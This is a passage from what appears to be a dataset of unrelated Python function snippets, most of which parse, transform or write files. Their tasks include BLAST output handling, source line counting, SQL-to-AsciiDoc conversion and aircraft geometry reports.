header + '\\n' + i)\n print('Fasta file generated!')", "def print_results(args):\n min_comics, filename = args\n with codecs.open(filename, 'a', 'utf-8') as fp:\n for name, shortname in sorted(load_result(json_file).items()):\n if name in exclude_comics:\n continue\n fp.write(u\"add(%r, %r)\\n\" % (\n str(truncate_name(name)), str(shortname))\n )", "def lines(filename, exclude_imports=True, exclude_comments=True, exclude_tests=True, exclude_globals=True, exclude_blank=True, verbose=False, is_c=False, s=None):\n if s is None:\n s = open(filename, 'rt').read()\n\n L = s.split('\\n')\n \n # Hack to strip out triple and single quote string lines in a heuristic (unreliable) way, which avoids parsing Cython\n if not is_c:\n for i in range(len(L)):\n if L[i].strip().startswith(\"'\") and L[i].strip().endswith(\"'\"):\n L[i] = ''\n i = 0\n while i < len(L):\n found = False\n for triple_quote in ['\"\"\"', \"'''\"]:\n if L[i].strip().startswith(triple_quote):\n L[i] = L[i].strip()[3:]\n for j in range(i, len(L)):\n if triple_quote in L[j]:\n found = True\n L[j] = ''\n if found:\n break\n i = j+1\n if not found:\n i += 1\n else:\n begin_comment = '/*'\n end_comment = '*/'\n i = 0\n while i < len(L):\n found = False\n if begin_comment in L[i]:\n rest = L[i][L[i].index(begin_comment)+len(begin_comment):]\n L[i] = L[i][:L[i].index(begin_comment)]\n if end_comment in rest:\n found = True\n i += 1\n else:\n for j in range(i+1, len(L)):\n if end_comment in L[j]:\n found = True\n L[j] = L[j][L[j].index(end_comment)+len(end_comment):]\n else:\n L[j] = ''\n if found:\n break\n i = j + 1\n if not found:\n i += 1\n\n# util.print_header('Lines before exclude_tests:' + filename, '\\n'.join(L))\n\n # Hack to strip out def test() and other methods in a heuristic (unreliable) way, which avoids parsing Cython\n if exclude_tests:\n # Also exclude makeColorMatrix so that our camera pipe is apples-to-apples comparable with reported lines in Halide paper\n if not is_c:\n methods = 'test run_test_all mandelbrot_gray mandelbrot_color composite_numpy composite_numexpr makeColorMatrix'.split()\n else:\n methods = ['int main', 'void main']\n i = 0\n while i < len(L):\n L_i_strip = L[i].strip()\n if ((not is_c and (any(L_i_strip.startswith('def ' + method) for method in methods) or\n any(L_i_strip.startswith('cdef ' + method) for method in methods))) or\n (is_c and (any(L_i_strip.startswith(method) for method in methods)))):\n L[i] = ''\n for j in range(i+1, len(L)):\n L_j_strip = L[j].strip()\n c_ok = True\n if is_c:\n c_ok = L_j_strip != '{' and L_j_strip != '}'\n if not L[j].startswith(' ') and not L[j].startswith('\\t') and not len(L[j].strip()) == 0 and c_ok:\n break\n else:\n L[j] = ''\n i = j\n elif (L[i].strip().startswith('test(') or L[i].strip().startswith('run_test_all(')) and not is_c:\n L[i] = ''\n i += 1\n else:\n i += 1\n\n# util.print_header('Lines before exclude_imports:' + filename, '\\n'.join(L))\n if exclude_imports:\n if not is_c:\n L = [x for x in L if not x.lstrip().startswith('import') and not x.lstrip().startswith('cimport') and not x.startswith('cdef extern')]\n else:\n L = [x for x in L if not x.lstrip().startswith('#include')]\n# util.print_header('Lines before exclude_comments:' + filename, '\\n'.join(L))\n if exclude_comments:\n if not is_c:\n L = [x for x in L if not x.lstrip().startswith('#') and not x.strip() == 'pass']\n else:\n L = [x for x in L if not x.lstrip().startswith('//')]\n# util.print_header('Lines before exclude_globals:' + filename, '\\n'.join(L))\n if exclude_globals and not 
is_c:\n L = [x for x in L if (x.startswith(' ') or x.startswith('\\t') or x.startswith('def') or x.startswith('cdef')) and (not x.lstrip().startswith('has_'))]\n# util.print_header('Lines before exclude_blank:' + filename, '\\n'.join(L))\n\n if is_c:\n # Also exclude makeColorMatrix so that C camera pipe is apples-to-apples comparable with reported lines in Halide paper\n L = [x for x in L if not x.lstrip().startswith('matrix_3200') and not x.lstrip().startswith('matrix_7000')]\n if exclude_blank:\n L = [x for x in L if not len(x.strip()) == 0]\n\n if verbose:\n util.print_header('Final lines for:' + filename, '\\n'.join(L))\n\n return len(L)", "def read_file(self, file):\n buffer = ''\n for line in file.readlines():\n line = line.strip()\n if not line.startswith('#'):\n buffer += ' ' + line\n return buffer", "def findDocumentsTwo():\n lineTwo = 0\n counterTwo = 0\n\n with open('bc.processed2.csv', 'r') as readfile,\\\n open('documentsTwo.txt', 'w') as writefile:\n for line in readfile:\n lineTwo += 1\n if re.match('^<document', line):\n counterTwo += 1\n writefile.write(str(counterTwo) + '\\t' +\n str(lineTwo) + '\\t' + line)\n\n divided4 = counterTwo / 4\n lines4 = lineTwo / 4\n writefile.write('\\n' + '--------------------------------' + '\\n')\n writefile.write('divided4: ' + str(divided4) + '\\n')\n writefile.write('lines divided by 4: ' + str(lines4) + '\\n')\n writefile.write('--------------------------------' + '\\n')\n writefile.write('1: ' + '1\\n')\n writefile.write('2: ' + str(lines4) + '\\n')\n writefile.write('3: ' + str((lines4 * 2)) + '\\n')\n writefile.write('4: ' + str((lines4 * 3)))\n print('divided4: ' + str(divided4))\n print('lines divided by 4: ' + str(lines4))", "def main():\n outfile = 'result.txt'\n\n if os.path.exists(outfile):\n os.remove(outfile)\n\n for arg in sys.argv[1:]:\n get_info(arg, outfile)", "def main(argv):\r\n\r\n def log_error(s):\r\n sys.stderr.write(s)\r\n sys.stderr.write('\\n')\r\n def log(s):\r\n pass\r\n\r\n global TEXT_INCLS\r\n TEXT_INCLS = []\r\n\r\n command = os.path.split(argv[0])[1]\r\n params = {}\r\n cpt_char = None\r\n comments = False\r\n\r\n #Extract options\r\n try:\r\n opts, args = getopt.getopt(\r\n argv[1:],\r\n \"c:a:t:r:A:V:R:o:vmh\",\r\n [\"title-char=\",\r\n \"table-attributes=\", \"table-header=\", \"row-pattern=\",\r\n \"view-table-attributes=\", \"view-header=\", \"view-row-pattern=\",\r\n \"output=\", \"verbose\", \"comments\", \"help\"])\r\n\r\n infile = args and args[0] or None\r\n outfile = infile and \"%s.asciidoc\" % os.path.splitext(os.path.split(infile)[1])[0] or '-'\r\n\r\n except getopt.GetoptError, err:\r\n log_error(main.__doc__ % locals())\r\n log_error(\"Error: %s\" % err)\r\n return -2\r\n except IndexError, err:\r\n log_error(main.__doc__ % locals())\r\n log_error(\"Error: File not specified.\")\r\n return -2 \r\n\r\n \r\n for o, a in opts:\r\n if o in (\"-c\", \"--title-char\"):\r\n a = a.strip()\r\n if len(a) > 1:\r\n cpt_char = a[0]\r\n params['title_char'] = a[1]\r\n else:\r\n params['title_char'] = a\r\n elif o in (\"-v\", \"--verbose\"):\r\n log = log_error\r\n elif o in (\"-o\", \"--output\"):\r\n outfile = a\r\n elif o in (\"-m\", \"--comments\"):\r\n comments = True\r\n elif o in (\"-h\", \"--help\"):\r\n print main.__doc__ % locals()\r\n return 0\r\n\r\n if outfile=='-':\r\n outfile = None\r\n\r\n if comments:\r\n log(\"Generating SQL COMMENTS from SQL\")\r\n log(\"================================\")\r\n else:\r\n log(\"Generating ASCIIDOC from SQL\")\r\n 
log(\"============================\")\r\n\r\n try:\r\n # Read SQL\r\n log(\"Reading file %s ...\" % infile)\r\n f = infile and open(infile) or sys.stdin\r\n sql = f.read()\r\n f.close()\r\n\r\n if comments:\r\n ret = objects_to_comments(sql)\r\n else:\r\n ret = TOP_COMMENT\r\n\r\n if cpt_char:\r\n ret += \"\\n\\n%s\\n%s\\n\" % (TABLES_CPT, cpt_char*len(TABLES_CPT))\r\n\r\n # Parse Tables from SQL\r\n log(\"Parsing Tables...\")\r\n ret += tables_to_asciidoc(sql, **params)\r\n\r\n if cpt_char:\r\n # Parse Views from SQL\r\n vws = views_to_asciidoc(sql, **params)\r\n log(\"Parsing Views...\")\r\n if vws.strip():\r\n ret += \"\\n\\n%s\\n%s\\n\" % (VIEWS_CPT, cpt_char*len(VIEWS_CPT))\r\n ret += vws\r\n \r\n\r\n # Making title references\r\n ret = asciidoc.make_title_references(ret)\r\n \r\n # Making text inclusions of the Views\r\n for i in range(len(TEXT_INCLS)):\r\n ret = ret.replace(\"INCLUSION_%d\" % i, TEXT_INCLS[i])\r\n\r\n # Write SQL\r\n log(\"Writing file %s ...\" % outfile)\r\n f = outfile and open(outfile, \"w\") or sys.stdout\r\n f.write(ret)\r\n f.close()\r\n\r\n log(\"Done!\")\r\n \r\n except Exception,err:\r\n log_error(\"Error: %s\" % err)\r\n raise\r\n\r\n log(\"\")\r\n return 0", "def write_result(file_name, name, entries, extra_includes, src_file_names):\r\n\r\n with open(file_name, 'w', newline='\\n') as f:\r\n f.write('// Generated by %s\\n' % os.path.basename(__file__))\r\n f.write('// Based on %s: %s\\n' %\r\n ((\"this file\" if len(src_file_names) < 2 else\r\n \"these files\"), \", \".join(src_file_names)))\r\n methods = entries[0]\r\n if len(methods) != 0:\r\n f.write(to_PyMethodDef(name, methods, extra_includes))\r\n f.write('\\n')\r\n\r\n properties = entries[1]\r\n if len(properties) != 0:\r\n f.write('\\n')\r\n f.write(to_PyGetSetDef(name, properties))", "def summarize_end(sample):\n (species, sex, tissue, replicate) = sample.split(\"_\")\n ins = FocalIntersect(species, sex, tissue, replicate)\n with open(\"../data/output/\" + ins.name + \".end.A.txt\", 'w') as f:\n for isoseqid in ins.end_infoA.keys():\n exonnum1, exonnum2, five_desc, three_desc = ins.end_infoA[isoseqid]\n transid = ins.isoseqid2besttransidA[isoseqid]\n f.write(isoseqid + \"\\t\" + transid + \"\\t\" + exonnum1 + \"\\t\" + exonnum2 + \"\\t\" + five_desc + \"\\t\" + three_desc + \"\\n\")\n\n with open(\"../data/output/\" + ins.name + \".end.B.txt\", 'w') as f:\n for isoseqid in ins.end_infoB.keys():\n exonnum1, exonnum2, five_desc, three_desc = ins.end_infoB[isoseqid]\n transid = ins.isoseqid2besttransidB[isoseqid]\n f.write(isoseqid + \"\\t\" + transid + \"\\t\" + exonnum1 + \"\\t\" + exonnum2 + \"\\t\" + five_desc + \"\\t\" + three_desc + \"\\n\")", "def start_queryResult_generator(inFile, fDic, work_sheet):\n \"\"\" http://biopython.org/DIST/docs/api/Bio.SearchIO.BlastIO-module.html\"\"\"\n qGenerator = SearchIO.parse(inFile, 'blast-xml')\n max_hits = 0\n query_count = 1\n # Step through all the records in the lump xml data file and write out\n # each separate hit to file. 
Also write the summary information to the\n # work sheet.\n for query_result in qGenerator:\n print('Processing Query BLAST return ' + str(query_count))\n number_hits = int(len(query_result.hits))\n # Extend header out right if new MAXHITS\n if number_hits > max_hits:\n max_hits = number_hits \n if number_hits == 0:\n # Construct path plus file name for no hit query\n filename = str(fDic['topDir'] + fDic['noHit'] + 'Query_' \n + str(query_count) + '_H_none.xml')\n # Write out any Queries that had to hits to a no Hit subfolder\n SearchIO.write(query_result, filename, 'blast-xml')\n write_qr_to_ws(query_count, query_result, work_sheet)\n else :\n # Now set up a counter of 'hits' in the QueryResult so hit's\n # can be sliced away into their own record cleanly.\n hit_count = 0;\n for hit in query_result.hits:\n total_hsps = len (hit.hsps)\n lowest_eval = hit.hsps[0].evalue\n best_hsp = hit.hsps[0]\n for hsp in hit.hsps:\n if hsp.evalue < lowest_eval:\n lowest_eval = hsp.evalue\n best_hsp = hsp\n filename = str(fDic['topDir'] + outputFileName(query_count, hit, best_hsp))\n SearchIO.write(query_result[hit_count:(hit_count + 1)], filename , 'blast-xml')\n hit_count += 1\n # Write out query_result to worksheet \n write_qr_to_ws(query_count, query_result, work_sheet)\n query_count += 1\n # break is debugging code\n # if query_count == 20:\n # break\n build_ws_header(work_sheet, max_hits)\n return qGenerator", "def process_or_results(self, filenames):\n \n #Check if we're maximising or minimising\n optTask = self._getTask('optimization')\n problem = optTask.find(xmlns + 'Problem')\n for parameter in problem:\n if parameter.attrib['name']=='Maximize':\n max_param = parameter.attrib['value']\n if max_param == '0':\n maximize = False\n else:\n maximize = True\n \n output_file = open(os.path.join(self.path, 'raw_results.txt'), 'w')\n \n\n #Match a string of the format ( 0.0995749 0.101685 0.108192 0.091224 ) 0.091224 0 \n #Contains parameter values, the best optimization value, the cpu time, and some other values.\n output_string = r'\\(\\s(?P<params>.+)\\s\\)\\s+(?P<best_value>\\S+)\\s+(?P<cpu_time>\\S+)\\.*'\n output_re = re.compile(output_string)\n \n best_value = None\n best_line = None\n \n #Copy the contents of the first file to results.txt\n for line in open(os.path.join(self.path, filenames[0]), 'r'):\n output_file.write(line)\n if line != '\\n':\n if output_re.match(line):\n value = float(output_re.match(line).groupdict()['best_value'])\n if best_value != None and maximize:\n if value > best_value:\n best_value = value\n best_line = line\n elif best_value != None and not maximize:\n if value < best_value:\n best_value = value\n best_line = line\n elif best_value == None:\n best_value = value\n best_line = line\n else:\n pass\n \n #And for all other files, copy everything but the last line\n for filename in filenames[1:]:\n firstLine = True\n for line in open(os.path.join(self.path,filename), 'r'):\n if not firstLine:\n output_file.write(line)\n if line != '\\n':\n if output_re.match(line):\n value = float(output_re.match(line).groupdict()['best_value'])\n if maximize:\n if value > best_value:\n best_value = value\n best_line = line\n elif not maximize:\n if value < best_value:\n best_value = value\n best_line = line\n else:\n pass\n firstLine = False\n \n \n output_file.close()\n \n #Write the best value to results.txt\n output_file = open(os.path.join(self.path, 'results.txt'), 'w')\n \n output_file.write('Best value\\t')\n \n for parameter in self.get_optimization_parameters():\n\n 
output_file.write(parameter[0].encode('utf8'))\n output_file.write('\\t')\n output_file.write('\\n')\n\n best_line_dict = output_re.match(best_line).groupdict()\n\n output_file.write(best_line_dict['best_value'])\n output_file.write('\\t')\n \n for parameter in best_line_dict['params'].split('\\t'):\n output_file.write(parameter)\n output_file.write('\\t')\n output_file.close()", "def whriteInOuput(finalOutput):\n\n os.chdir(\"D:/IIHT/Python/Project/NRPT all companies scrapper/caches\")\n #open text file, return an object of type io.TextIOWrapper\n with open(\"Companies Website.txt\", \"w\") as writ:\n #write each line in the object op, return an object of type int\n writ.write('\\n'.join(finalOutput) + \"\\n\")", "def cleaning_file():\n f = open (\"report_for_judy_part2.txt\", \"w\")\n f.close()", "def write_to_txt(self):\r\n file = open(self.output_path, 'w')\r\n for question_id in self.question_ids:\r\n file.write(self.questions[question_id].question_string+str(self.questions[question_id].answer)+'\\n')\r\n file.close()", "def main(nlp, file_path, final_file_path, from_line=0, to_line=None):\n with open(final_file_path, \"w\") as parsed_file:\n with open(file_path) as cnn_dm:\n line = cnn_dm.readline().strip()\n article_idx = 0\n while article_idx < from_line:\n line = cnn_dm.readline().strip()\n article_idx += 1\n if to_line is None:\n while line is not None and line != '':\n process_line(nlp, line, parsed_file)\n article_idx += 1\n print(\"{} articles processed from file {}\".format(article_idx, file_path))\n line = cnn_dm.readline().strip()\n else:\n while article_idx < to_line and line is not None and line != '':\n process_line(nlp, line, parsed_file)\n article_idx += 1\n print(\"{}th article processed from file {}\".format(article_idx, file_path))\n line = cnn_dm.readline().strip()", "def compose_logfile_lines(start_time, db_format_time, blast_time, option_lines,\r\n formatdb_cmd, blast_results, options, all_ids,\r\n hit_ids, removed_hit_ids,\r\n included_ids, DEBUG):\r\n\r\n log_lines = []\r\n log_lines.append(\"Sequence exclusion analysis run on %s\" % strftime(\"%c\"))\r\n log_lines.append(\r\n \"Formatting subject database took %2.f seconds\" %\r\n (db_format_time))\r\n log_lines.append(\r\n \"BLAST search took %2.f minute(s)\" %\r\n ((blast_time) / 60.0))\r\n log_lines.append(\r\n \"Total analysis completed in %2.f minute(s)\" %\r\n ((time() - start_time) / 60.0))\r\n\r\n log_lines.append(FORMAT_BAR)\r\n log_lines.append(\r\n \"| Options |\")\r\n log_lines.append(FORMAT_BAR)\r\n\r\n log_lines.extend(option_lines)\r\n log_lines.append(\"Subject database formatted with command: %s\"\r\n % formatdb_cmd)\r\n\r\n log_lines.append(FORMAT_BAR)\r\n log_lines.append(\r\n \"| Results |\")\r\n log_lines.append(FORMAT_BAR)\r\n\r\n log_lines.append(\"BLAST results above e-value threshold:\")\r\n log_lines.append(\r\n \"\\t\".join([\"Query id\", \"Subject id\", \"percent identity\", \"alignment length\",\r\n \"mismatches\", \"gap openings\", \"q. start\", \"q. end\", \"s. start\", \"s. 
end\", \"e-value\", \"bit score\"]))\r\n\r\n for line in blast_results:\r\n if line.startswith(\"#\"):\r\n continue\r\n else:\r\n log_lines.append(line)\r\n\r\n log_lines.append(\r\n \"Hits matching e-value and percent alignment filter: %s\" %\r\n ','.join(sorted(hit_ids)))\r\n\r\n log_lines.append(FORMAT_BAR)\r\n log_lines.append(\r\n \"| Summary |\")\r\n log_lines.append(FORMAT_BAR)\r\n\r\n log_lines.append(\"Input query sequences: %i\" % len(all_ids))\r\n log_lines.append(\r\n \"Query hits from BLAST: %i\" %\r\n (len(hit_ids) + len(removed_hit_ids)))\r\n log_lines.append(\r\n \"Query hits from BLAST lacking minimal percent alignment: %i\" %\r\n len(removed_hit_ids))\r\n log_lines.append(\"Final hits: %i\" % len(hit_ids))\r\n log_lines.append(\"Output screened sequences: %i\" % len(included_ids))\r\n\r\n log_lines.append(FORMAT_BAR)\r\n log_lines.append(\r\n \"| Output |\")\r\n log_lines.append(FORMAT_BAR)\r\n\r\n log_lines.append(\r\n \"Writing excluded sequences (hits matching filters) to: %s\" %\r\n join(options.outputdir, \"matching.fna\"))\r\n log_lines.append(\r\n \"Writing screened sequences (excluding hits matching filters) to: %s\" %\r\n join(options.outputdir, \"non-matching.fna\"))\r\n log_lines.append(\r\n \"Writing raw BLAST results to: %s\" %\r\n join(options.outputdir, 'raw_blast_results.txt'))\r\n\r\n # format for printing\r\n revised_log_lines = []\r\n for line in log_lines:\r\n line = line + \"\\n\"\r\n revised_log_lines.append(line)\r\n\r\n if DEBUG:\r\n for line in log_lines:\r\n print line\r\n\r\n return revised_log_lines", "def get_file_contents(self):\n with open(self.sql_file, 'r') as sql:\n text = sql.read()\n # text = text.replace('\\n', '\\n\\n')\n # text=sql.read()\n # TODO: fix some text replacement issues here\n # https://github.com/andialbrecht/sqlparse/issues/313\n return self.filter_text(text)", "def output_1cell(self, filename):\n\n date_concat = \"{0} to {1}\".format(self.startDate, self.endDate)\n if active_restaurant_loop:\n column_name = [\"range\", \"start_date\",\n \"end_date\", \"location_id\", \"content\"]\n data = [date_concat, self.startDate, self.endDate, str(\n self.payload[\"locationGroupID\"]), \"{0}\".format(self.content)]\n data_out = [column_name, data]\n else:\n column_name = [\"range\", \"start_date\", \"end_date\", \"content\"]\n data = [date_concat, self.startDate,\n self.endDate, \"{0}\".format(self.content)]\n data_out = [column_name, data]\n\n # If active restaurant loop is true\n if not os.path.isfile(filename):\n with open(filename, \"w\") as f:\n writer = csv.writer(f)\n #writer.writerow([\"range\", \"start_date\", \"end_date\", \"content\"])\n #writer.writerow([date_concat, start_date, end_date, \"{0}\".format(self.content)])\n writer.writerows(data_out)\n # f.write([\"content\"])\n # f.write([\"{0}\"].format(self.content))\n f.close()\n else:\n with open(filename, \"a\") as f:\n writer = csv.writer(f)\n writer.writerows([data])\n f.close()\n\n logging.info(\"Outputting... 
\")\n self.produce_manifest(filename)", "def derive_terms_and_comments(infile: str = None, outfile: str = None) -> None:\n\n id_ctr = 0\n comment_ctr = 0\n missing_id_ctr = 0\n missing_comment_ctr = 0\n null_comment_ctr = 0\n terms_and_comments_list = []\n\n logging.info(\"Abou to parse '{}'\".format(infile))\n\n with open(infile) as file:\n\n documents = yaml.full_load(file)\n\n for item, doc in documents.items():\n if item == '@graph':\n logging.info(\"Found '@graph' section\")\n\n graph_list = doc\n\n for graph_dict in graph_list:\n term_name = None\n comment = None\n if '@id' in graph_dict:\n term_name = graph_dict['@id']\n id_ctr += 1\n if 'rdfs:comment' in graph_dict:\n comment = graph_dict['rdfs:comment']\n if comment is None or comment == '':\n comment = 'N/A'\n logging.info(\"Found term '{}' with null comment so assigned '{}'\".format(term_name, comment))\n null_comment_ctr += 1\n else:\n logging.info(\"Found term '{}' with comment '{}'\".format(term_name, comment))\n comment_ctr += 1\n else:\n logging.info(\"Did not find comment for term '{}'\".format(term_name))\n missing_comment_ctr += 1\n else:\n logging.error(\"Did not find id!\")\n missing_id_ctr += 1\n\n terms_and_comments_list.append([term_name, comment])\n\n logging.info(\"Found '{}' ids\".format(id_ctr))\n logging.info(\"Found '{}' comments\".format(comment_ctr))\n\n if missing_id_ctr > 0:\n print(\"Encountered '{}' missing ids\".format(missing_id_ctr))\n\n if missing_comment_ctr > 0:\n print(\"Encountered '{}' missing comments\".format(missing_comment_ctr))\n\n if null_comment_ctr > 0:\n print(\"Encountered '{}' comments with null values\".format(null_comment_ctr))\n\n with open(outfile, 'w') as fh:\n for term_and_comment in terms_and_comments_list:\n fh.write(term_and_comment[0] + \"\\t\" + term_and_comment[1] + \"\\n\")\n\n logging.info(\"Wrote '{}'\".format(outfile))\n print(\"Wrote '{}'\".format(outfile))", "def compile_file(self, filename):\n if self.basepath is None:\n self.basepath = os.path.split(filename)\n\n i = 1\n txt = \"\"\n with open(filename, \"r\") as reader:\n for line in reader:\n if line != \"\\n\":\n txt += line\n debug(logger, \"*** [%d] %s\" % (i, line))\n if balanced(txt) == 0:\n print(self.parseit(txt))\n txt = \"\"\n i = i + 1\n\n if len(txt):\n print(\"Error: missing ()'s, %s\" % txt)", "def produce_output_txt(self):\n\n NAME = \"TODO get name form cpacs object\"\n\n result_dir = get_results_directory(\"WeightConventional\")\n\n output_file = Path(result_dir, \"Aircraft_Geometry.out\")\n\n OutputTextFile = open(output_file, \"w\")\n\n OutputTextFile.write(\"\\n#################################################\")\n OutputTextFile.write(\"\\n###### AIRCRAFT GEOMETRY EVALUATION MODULE ######\")\n OutputTextFile.write(\"\\n###### OUTPUTS ######\")\n OutputTextFile.write(\"\\n#################################################\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nAircraft: \" + NAME)\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nGeometry Evaluations-----------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nUSEFUL INFO -------------------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\n \"\\nIf fuselage or wing number is 
greater than 1 the\\n\"\n \"information of each obj are listed in an \"\n \"array ordered\\nprogressively\"\n )\n OutputTextFile.write(\n \"\\nSymmetry output: 0 = no symmetry, 1 = x-y,\\n\" + \"2 = x-z, 3 = y-z planes\"\n )\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nRESULTS -----------------------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nFUSELAGE ----------------------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(f\"\\nNumber of fuselage sections [-]: {self.fuse_sec_nb}\")\n OutputTextFile.write(f\"\\nNumber of fuselage segments [-]: {self.fuse_seg_nb}\")\n OutputTextFile.write(f\"\\nCabin segments array [-]: {self.cabin_seg}\")\n OutputTextFile.write(f\"\\nFuse Length [m]: {np.around(self.fuse_length, 5)}\")\n OutputTextFile.write(f\"\\nFuse nose Length [m]: {np.around(self.fuse_nose_length, 5)}\")\n OutputTextFile.write(f\"\\nFuse cabin Length [m]: {np.around(self.fuse_cabin_length, 5)}\")\n OutputTextFile.write(f\"\\nFuse tail Length [m]: {np.around(self.fuse_tail_length, 5)}\")\n OutputTextFile.write(f\"\\nAircraft Length [m]: {np.around(self.tot_length, 5)}\")\n OutputTextFile.write(\n \"\\nCircumference of each section of the fuselage [m]:\"\n f\"\\n{np.around(self.fuse_sec_circ, 5)}\"\n )\n OutputTextFile.write(\n \"\\nRelative distance of each section of the\"\n + \"fuselage, respect to the first one [m]: \\n\"\n + str(np.around(self.fuse_sec_rel_dist, 5))\n )\n OutputTextFile.write(\n \"\\nLength of each segment of the fuselage [m]: \\n\"\n + str(np.around(self.fuse_seg_length, 5))\n )\n OutputTextFile.write(\n \"\\nMean fuselage width [m]: \" + str(np.around(self.fuse_mean_width, 5))\n )\n OutputTextFile.write(\n \"\\nWidth of each section of the fuselage [m]: \\n\"\n + str(np.around(self.fuse_sec_width, 5))\n )\n OutputTextFile.write(\n \"\\nVolume of each segment of the fuselage \"\n \"[m^3]: \\n\" + str(np.around(self.fuse_seg_vol, 5))\n )\n OutputTextFile.write(\n \"\\nVolume of the cabin [m^3]: \" + str(np.around(self.fuse_cabin_vol, 5))\n )\n OutputTextFile.write(\"\\nVolume of the fuselage [m^3]: \" + str(np.around(self.fuse_vol, 5)))\n OutputTextFile.write(\"\\n\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nWINGS -------------------------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(f\"\\nNumber of Wings [-]: {self.wing_nb}\")\n OutputTextFile.write(f\"\\nWing symmetry plane [-]: {self.wing_sym}\")\n OutputTextFile.write(f\"\\nNumber of wing sections [-]: {self.wing_sec_nb}\")\n OutputTextFile.write(f\"\\nNumber of wing segments [-]: {self.wing_seg_nb}\")\n OutputTextFile.write(f\"\\nWing Span [m]: \\n{np.around(self.wing_span, 5)}\")\n OutputTextFile.write(\n \"\\nWing MAC length [m]: \\n\"\n + str(\n np.around(\n self.wing_mac[\n 0,\n ],\n 5,\n )\n )\n )\n OutputTextFile.write(\n \"\\nWing MAC x,y,z coordinate [m]: \\n\"\n + str(\n np.around(\n self.wing_mac[\n 1:4,\n ],\n 5,\n )\n )\n )\n OutputTextFile.write(\n \"\\nWings sections thickness [m]: \\n\" + str(np.around(self.wing_sec_thickness, 5))\n )\n OutputTextFile.write(\n \"\\nWings sections mean thickness [m]: \\n\" + str(np.around(self.wing_sec_mean_thick, 5))\n )\n OutputTextFile.write(\n \"\\nWing segments length [m]: \\n\" + 
str(np.around(self.wing_seg_length, 5))\n )\n OutputTextFile.write(\n \"\\nWing max chord length [m]: \\n\" + str(np.around(self.wing_max_chord, 5))\n )\n OutputTextFile.write(\n \"\\nWing min chord length [m]: \\n\" + str(np.around(self.wing_min_chord, 5))\n )\n OutputTextFile.write(\n \"\\nWings planform area [m^2]: \\n\" + str(np.around(self.wing_plt_area, 5))\n )\n OutputTextFile.write(\n \"\\nMain wing planform area [m^2]: \" + str(np.around(self.wing_plt_area_main, 5))\n )\n OutputTextFile.write(\"\\nVolume of each wing [m^3]: \\n\" + str(np.around(self.wing_vol, 5)))\n OutputTextFile.write(\"\\nTotal wing volume [m^3]: \" + str(np.around(self.wing_tot_vol, 5)))\n OutputTextFile.write(\"\\nWing volume for fuel storage [m^3]: \" + str(self.wing_fuel_vol))\n\n # Close Text File\n OutputTextFile.close()", "def main():\n\n preprocessed_file = preprocess_clinical_trials()\n\n preprocessed_file.to_csv(PREPROCESSED_CLINICAL_TRIALS_FILE_PATH, index=False)", "def main():\n file_one_path, file_two_path, output_path =\\\n get_command_line_arguments(\n ['/home/ehler002/project/groups/go/Data/Cluster_Data/Dataset.txt',\n '/home/ehler002/project/groups/go/Data/Cluster_Data/translated_genes.fpkm_table',\n '/home/ehler002/project/groups/go/Data/Cluster_Data/Full_fpkm_Table.txt'])\n pattern = 'CRO_T'\n for file_path in [file_one_path, file_two_path]:\n assert os.path.exists(file_path), 'File %s does not exist.' % file_path\n start_time = datetime.datetime.now()\n print('Started concatenation at %s' % start_time)\n file_contents, headers = get_file_contents(file_two_path)\n file_contents = sort_file_contents(file_contents)\n file_contents = remove_pattern(file_contents, pattern)\n concatenate_files(file_one_path, file_contents, headers, output_path)\n print('Finished concatenation in %s' % (datetime.datetime.now() - start_time))", "def apply_filter(input_file, output_file, features):\n lines = input_file.readlines()\n lines = list(map(clean, lines))\n\n for i in range(0, len(lines)):\n line = lines[i]\n feat = extract(line[\"features\"], features)\n output_line = line[\"rank\"] + \" \" + line[\"qid\"]\n for key in features:\n output_line += \" \" + str(key) + \":\" + str(feat[key])\n output_line += \" #\" + line[\"comment\"]\n output_file.write(output_line)", "def sexyStrip(dataFile):\n correct = open('correct.txt', 'w+')\n for line in dataFile:\n stripLines = line.rstrip()\n fixedLines = stripLines + \"\\n\"\n correct.write(fixedLines)\n correct.close()", "def coord_atoms():\n \n import os\n choice = input('Enter the name of the file: ')\n filepath = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Data', choice)\n a_list = []\n with open(filepath, 'r') as pdb:\n for line in pdb:\n if line[:4] == 'ATOM':\n line_split = line.split()[6:9]\n a_list.append(line_split) \n choice1 = input('Enter the name of the outfile: ')\n filepath1 = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', choice1)\n with open(filepath1, 'w') as outfile:\n for i in a_list:\n outfile.writelines(i)\n print('Done!')\n print(i)", "def joinInds(r1,r2,outfname):\n outf = open(outfname,'w')\n f1 = file(r1,'r')\n f2 = file(r2,'r')\n for row1 in f1:\n outf.write('%s\\n' % (row1.strip()))\n for row1 in f2:\n outf.write('%s\\n' % (row1.strip()))\n outf.close()", "def output_for_test_case(test_case):\n scriptname = os.path.basename(__file__)\n camel_case_type = helpers.to_camel_case(test_case.test_type)\n test_case_name = TEST_CASE_TPL.format(test_type=camel_case_type,\n direction=helpers.to_camel_case(\n 
